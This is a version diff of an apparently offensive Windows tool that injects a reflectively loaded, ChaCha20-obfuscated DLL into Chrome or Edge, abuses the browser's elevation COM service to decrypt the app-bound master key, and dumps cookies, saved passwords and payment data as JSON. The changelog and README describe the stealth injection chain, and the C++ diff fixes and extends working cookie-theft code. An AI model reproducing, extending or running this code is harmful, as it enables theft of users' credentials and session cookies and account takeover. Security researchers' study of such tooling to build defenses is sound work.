v0.14.2

Author: xaitax

CHANGELOG.md

@@ -2,6 +2,13 @@
 
 ## 🆕 Changelog
 
+### v0.14.2
+- **Bug Fix: Corrected Cookie Decryption Payload Handling**: Resolved a critical regression where encrypted cookie values were not being correctly parsed after decryption.
+  - The recent architectural refactor to a data-driven configuration (`v0.14.1`) inadvertently omitted a crucial processing step specific to cookie payloads. Unlike passwords or payment data, the decrypted plaintext for a cookie contains a 32-byte metadata header that must be stripped to reveal the actual cookie value.
+- **Feature Enhancement: Expanded Cookie Data Extraction**: The tool now extracts a richer set of cookie attributes, providing a more comprehensive data set for analysis.
+  - The SQLite query for cookies has been expanded to include `path`, `expires_utc`, `is_secure`, and `is_httponly`.
+  - The JSON output has been updated accordingly to include these new fields, converting the boolean flags to proper `true`/`false` values for improved usability.
+
 ### v0.14.1
 - **Architecture-Specific Stability Fix for x64 Syscall Trampoline**: Overhauled the x64 assembly trampoline to resolve a critical stability bug that caused a silent crash in the payload thread immediately after injection on x64 systems.
   - The previous dynamic, argument-aware loop created a complex code path that resulted in the assembler (`ml64.exe`) generating incorrect stack unwind data. This faulty data led to stack corruption and a silent crash when the new thread was initialized by the OS, causing the injector to hang indefinitely.

README.md

@@ -31,7 +31,7 @@ The tool's execution is focused on stealth and efficiency, built around a **Dire
 ### **Stage 2: The Injected Payload (In-Memory)**
 
 1.  **Bootstrapping:** The `ReflectiveLoader` stub executes, functioning as a custom in-memory PE loader. It correctly maps the DLL's sections, performs base relocations, and resolves its Import Address Table (IAT) by parsing the PEB and hashing function names. Finally, it invokes the payload's `DllMain`.
-2.  **C2 Connection & Setup:** The `DllMain` spawns a new thread that immediately connects to the named pipe handle passed by the injector. It reads the configuration, including the output path, sent by the injector. All subsequent logs and status updates are relayed back through this pipe.
+2.  **Connection & Setup:** The `DllMain` spawns a new thread that immediately connects to the named pipe handle passed by the injector. It reads the configuration, including the output path, sent by the injector. All subsequent logs and status updates are relayed back through this pipe.
 3.  **Target-Context COM Hijack:** Now running natively within the browser process, the payload instantiates the browser's internal `IOriginalBaseElevator` or `IEdgeElevatorFinal` COM server. As the call originates from a trusted process path, all of the server's security checks are passed.
 4.  **Master Key Decryption:** The payload calls the `DecryptData` method on the COM interface, providing the `app_bound_encrypted_key` it reads from the `Local State` file. The COM server dutifully decrypts the key and returns the plaintext AES-256 master key to the payload.
 5.  **Data Exfiltration:** Armed with the AES key, the payload enumerates all user profiles (`Default`, `Profile 1`, etc.). For each profile, it queries the relevant SQLite databases (`Cookies`, `Login Data`, `Web Data`), decrypts the data blobs using AES-256-GCM, and formats the secrets as JSON. The results are written directly to the output directory specified by the injector.

src/chrome_decrypt.cpp

@@ -1,5 +1,5 @@
 // chrome_decrypt.cpp
-// v0.14.1 (c) Alexander 'xaitax' Hagenah
+// v0.14.2 (c) Alexander 'xaitax' Hagenah
 // Licensed under the MIT License. See LICENSE file in the project root for full license information.
 
 #include <Windows.h>
@@ -281,6 +281,8 @@ namespace Payload
 
     namespace Data
     {
+        constexpr size_t COOKIE_PLAINTEXT_HEADER_SIZE = 32;
+
         struct ExtractionConfig
         {
             fs::path dbRelativePath;
@@ -293,19 +295,34 @@ namespace Payload
         const std::vector<ExtractionConfig> &GetExtractionConfigs()
         {
             static const std::vector<ExtractionConfig> configs = {
-                {fs::path("Network") / "Cookies", "cookies", "SELECT host_key, name, encrypted_value FROM cookies;",
+                {fs::path("Network") / "Cookies", "cookies", "SELECT host_key, name, path, is_secure, is_httponly, expires_utc, encrypted_value FROM cookies;",
                  nullptr,
                  [](sqlite3_stmt *stmt, const auto &key, const auto &state) -> std::optional<std::string>
                  {
-                     const uint8_t *blob = reinterpret_cast<const uint8_t *>(sqlite3_column_blob(stmt, 2));
+                     const uint8_t *blob = reinterpret_cast<const uint8_t *>(sqlite3_column_blob(stmt, 6));
                      if (!blob)
                          return std::nullopt;
                      try
                      {
-                         auto plain = Crypto::DecryptGcm(key, {blob, blob + sqlite3_column_bytes(stmt, 2)});
-                         return "  {\"host\":\"" + Utils::EscapeJson((const char *)sqlite3_column_text(stmt, 0)) +
-                                "\",\"name\":\"" + Utils::EscapeJson((const char *)sqlite3_column_text(stmt, 1)) +
-                                "\",\"value\":\"" + Utils::EscapeJson({(char *)plain.data(), plain.size()}) + "\"}";
+                         auto plain = Crypto::DecryptGcm(key, {blob, blob + sqlite3_column_bytes(stmt, 6)});
+                         if (plain.size() <= COOKIE_PLAINTEXT_HEADER_SIZE)
+                         {
+                             return std::nullopt;
+                         }
+
+                         const char *value_start = reinterpret_cast<const char *>(plain.data()) + COOKIE_PLAINTEXT_HEADER_SIZE;
+                         size_t value_size = plain.size() - COOKIE_PLAINTEXT_HEADER_SIZE;
+
+                         std::ostringstream json_entry;
+                         json_entry << "  {\"host\":\"" << Utils::EscapeJson((const char *)sqlite3_column_text(stmt, 0)) << "\""
+                                    << ",\"name\":\"" << Utils::EscapeJson((const char *)sqlite3_column_text(stmt, 1)) << "\""
+                                    << ",\"path\":\"" << Utils::EscapeJson((const char *)sqlite3_column_text(stmt, 2)) << "\""
+                                    << ",\"value\":\"" << Utils::EscapeJson({value_start, value_size}) << "\""
+                                    << ",\"expires\":" << sqlite3_column_int64(stmt, 5)
+                                    << ",\"secure\":" << (sqlite3_column_int(stmt, 3) ? "true" : "false")
+                                    << ",\"httpOnly\":" << (sqlite3_column_int(stmt, 4) ? "true" : "false")
+                                    << "}";
+                         return json_entry.str();
                      }
                      catch (...)
                      {

src/chrome_inject.cpp

@@ -1,5 +1,5 @@
 // chrome_inject.cpp
-// v0.14.1 (c) Alexander 'xaitax' Hagenah
+// v0.14.2 (c) Alexander 'xaitax' Hagenah
 // Licensed under the MIT License. See LICENSE file in the project root for full license information.
 
 #include <Windows.h>

src/encryptor.cpp

@@ -1,5 +1,5 @@
 // encryptor.cpp
-// v0.14.0 (c) Alexander 'xaitax' Hagenah
+// v0.14.2 (c) Alexander 'xaitax' Hagenah
 // Licensed under the MIT License. See LICENSE file in the project root for full license information.
 
 // Define the implementation flag BEFORE including the header
@@ -16,23 +16,24 @@ static const uint8_t aKey[32] = {
     0x1B, 0x27, 0x55, 0x64, 0x73, 0x8B, 0x9F, 0x4D,
     0x58, 0x4A, 0x7D, 0x67, 0x8C, 0x79, 0x77, 0x46,
     0xBE, 0x6B, 0x4E, 0x0C, 0x54, 0x57, 0xCD, 0x95,
-    0x18, 0xDE, 0x7E, 0x21, 0x47, 0x66, 0x7C, 0x94
-};
+    0x18, 0xDE, 0x7E, 0x21, 0x47, 0x66, 0x7C, 0x94};
 
 // A 96-bit (12-byte) nonce.
 static const uint8_t aNonce[12] = {
     0x4A, 0x51, 0x78, 0x62, 0x8D, 0x2D, 0x4A, 0x54,
-    0x88, 0xE5, 0x3C, 0x50
-};
+    0x88, 0xE5, 0x3C, 0x50};
 
-int main(int argc, char* argv[]) {
-    if (argc != 3) {
+int main(int argc, char *argv[])
+{
+    if (argc != 3)
+    {
         std::cerr << "Usage: " << argv[0] << " <input_file> <output_file>" << std::endl;
         return 1;
     }
 
     std::ifstream inFile(argv[1], std::ios::binary);
-    if (!inFile) {
+    if (!inFile)
+    {
         std::cerr << "Error opening input file: " << argv[1] << std::endl;
         return 1;
     }
@@ -44,12 +45,13 @@ int main(int argc, char* argv[]) {
     chacha20_xor(aKey, aNonce, buffer.data(), buffer.size(), 0);
 
     std::ofstream outFile(argv[2], std::ios::binary);
-    if (!outFile) {
+    if (!outFile)
+    {
         std::cerr << "Error opening output file: " << argv[2] << std::endl;
         return 1;
     }
-    
-    outFile.write(reinterpret_cast<const char*>(buffer.data()), buffer.size());
+
+    outFile.write(reinterpret_cast<const char *>(buffer.data()), buffer.size());
     outFile.close();
 
     std::cout << "Successfully ChaCha20-encrypted " << argv[1] << " to " << argv[2] << std::endl;

src/reflective_loader.c

@@ -1,5 +1,5 @@
 // reflective_loader.c
-// v0.14.1 (c) Alexander 'xaitax' Hagenah
+// v0.14.2 (c) Alexander 'xaitax' Hagenah
 // Licensed under the MIT License. See LICENSE file in the project root for full license information.
 
 #include <windows.h>

src/reflective_loader.h

@@ -1,5 +1,5 @@
 // reflective_loader.h
-// v0.14.1 (c) Alexander 'xaitax' Hagenah
+// v0.14.2 (c) Alexander 'xaitax' Hagenah
 // Licensed under the MIT License. See LICENSE file in the project root for full license information.
 
 #ifndef REFLECTIVE_LOADER_H

src/resource.rc

@@ -1,4 +1,4 @@
 // resource.rc
-// v0.14.1 (c) Alexander 'xaitax' Hagenah
+// v0.14.2 (c) Alexander 'xaitax' Hagenah
 // Licensed under the MIT License. See LICENSE file in the project root for full license information.
 PAYLOAD_DLL RCDATA "chrome_decrypt.enc"

src/syscall_trampoline_arm64.asm

@@ -1,5 +1,5 @@
 ; syscall_trampoline_arm64.asm
-; v0.14.1 (c) Alexander 'xaitax' Hagenah
+; v0.14.2 (c) Alexander 'xaitax' Hagenah
 ; Licensed under the MIT License. See LICENSE file in the project root for full license information.
 ;
 ; A simple and ABI-compliant ARM64 trampoline. This version preserves callee-saved

src/syscall_trampoline_x64.asm

@@ -1,5 +1,5 @@
 ; syscall_trampoline_x64.asm
-; v0.14.1 (c) Alexander 'xaitax' Hagenah
+; v0.14.2 (c) Alexander 'xaitax' Hagenah
 ; Licensed under the MIT License. See LICENSE file in the project root for full license information.
 ;
 ; ABI-compliant x64 trampoline with unconditional marshalling for max arguments.